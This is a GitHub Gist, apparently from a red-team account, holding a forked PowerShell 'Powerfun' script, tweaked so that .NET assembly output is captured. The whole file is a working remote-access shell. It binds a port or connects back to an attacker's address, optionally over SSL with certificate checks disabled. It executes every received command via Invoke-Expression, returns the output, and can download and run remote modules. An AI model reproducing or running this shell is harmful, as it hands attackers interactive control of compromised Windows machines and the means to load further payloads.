Created
July 21, 2019 19:00
-
-
Save RedTeams/d17ebf2c81b4a5f9bbf196deb52e487b to your computer and use it in GitHub Desktop.
Nishang Shells in addition to its Metasploit counterpart "Powerfun.ps1" refuse to capture output from .NET methods; As such redirecting console output to a string writer fixes the problem. Helpful for running assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Powerfun - Written by Ben Turner & Dave Hardy | |
| # Forked for a few quick fixes. | |
| function Get-Webclient | |
| { | |
| $wc = New-Object -TypeName Net.WebClient | |
| $wc.UseDefaultCredentials = $true | |
| $wc.Proxy.Credentials = $wc.Credentials | |
| $wc | |
| } | |
| function powerfun | |
| { | |
| Param( | |
| [String]$Command, | |
| [String]$Sslcon, | |
| [String]$Download, | |
| [String]$Address, | |
| [Int]$Port | |
| ) | |
| Process { | |
| $modules = @() | |
| if ($Command -eq "bind") | |
| { | |
| $listener = [System.Net.Sockets.TcpListener]$Port | |
| $listener.start() | |
| $client = $listener.AcceptTcpClient() | |
| } | |
| if ($Command -eq "reverse") | |
| { | |
| $client = New-Object System.Net.Sockets.TCPClient("$Address",$Port) | |
| } | |
| $stream = $client.GetStream() | |
| if ($Sslcon -eq "true") | |
| { | |
| $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) | |
| $sslStream.AuthenticateAsClient("$Address") | |
| $stream = $sslStream | |
| } | |
| [byte[]]$bytes = 0..20000|%{0} | |
| $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") | |
| $stream.Write($sendbytes,0,$sendbytes.Length) | |
| if ($Download -eq "true") | |
| { | |
| $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n") | |
| $stream.Write($sendbytes,0,$sendbytes.Length) | |
| ForEach ($module in $modules) | |
| { | |
| (Get-Webclient).DownloadString($module)|Invoke-Expression | |
| } | |
| } | |
| $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') | |
| $stream.Write($sendbytes,0,$sendbytes.Length) | |
| while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) | |
| { | |
| $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding | |
| $data = $EncodedText.GetString($bytes,0, $i) | |
| [Console]::OutputEncoding = [System.Text.Encoding]::ASCII | |
| $ConsoleOutput = New-Object -TypeName System.IO.StringWriter | |
| [Console]::SetOut($ConsoleOutput) | |
| $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) | |
| $sendback = $sendback + $ConsoleOutput.ToString(); | |
| $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' | |
| $x = ($error[0] | Out-String) | |
| $error.clear() | |
| $sendback2 = $sendback2 + $x | |
| $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) | |
| $stream.Write($sendbyte,0,$sendbyte.Length) | |
| $stream.Flush() | |
| } | |
| $client.Close() | |
| $listener.Stop() | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment